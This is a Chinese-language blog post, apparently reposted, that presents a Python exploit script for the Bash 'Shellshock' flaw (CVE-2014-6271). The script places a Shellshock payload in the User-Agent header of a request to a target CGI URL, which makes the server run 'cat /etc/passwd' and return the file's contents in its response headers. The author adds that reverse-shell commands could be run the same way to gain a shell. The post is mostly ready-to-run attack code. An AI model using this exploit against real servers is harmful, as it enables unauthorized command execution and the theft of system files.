Bash远程命令执行漏洞(CVE-2014-6271)分析利用

时间：2014-11-27 02:07:08 阅读：152 评论：0 收藏：0 [点我收藏+]

　这几天Bash被爆存在远程命令执行漏洞(CVE-2014-6271)，昨天参加完isc，晚上回家测试了一下，写了个python版本的测试小基本，贴上代码：

#coding:utf-8

import urllib,httplib

import sys,re,urlparse

#author:nx4dm1n

#website:www.nxadmin.com

def bash_exp(url):

urlsp=urlparse.urlparse(url)

hostname=urlsp.netloc

urlpath=urlsp.path

conn=httplib.HTTPConnection(hostname)

headers={"User-Agent":"() { :;}; echo `/bin/cat /etc/passwd`"}

conn.request("GET",urlpath,headers=headers)

res=conn.getresponse()

res=res.getheaders()

for passwdstr in res:

print passwdstr[0]+‘:‘+passwdstr[1]

if __name__==‘__main__‘:

#带http

if len(sys.argv)<2:

print "Usage: "+sys.argv[0]+"www.nxadmin.com/cgi-bin/index.cgi"

sys.exit()

else:

bash_exp(sys.argv[1])

　　脚本执行效果如图所示：

　　bash命令执行

　　也可以用burp进行测试。

　　利用该漏洞其实可以做很多事情，写的python小脚本只是执行了cat /etc/passwd。可以执行反向链接的命令等，直接获取一个shell还是有可能的。不过漏洞存在的条件也比较苛刻，测试找了一些，发现了很少几个存在漏洞。

原文：http://www.blogjava.net/qileilove/archive/2014/11/26/420619.html

踩

(0)

评论一句话评论（0）

分享档案

更多>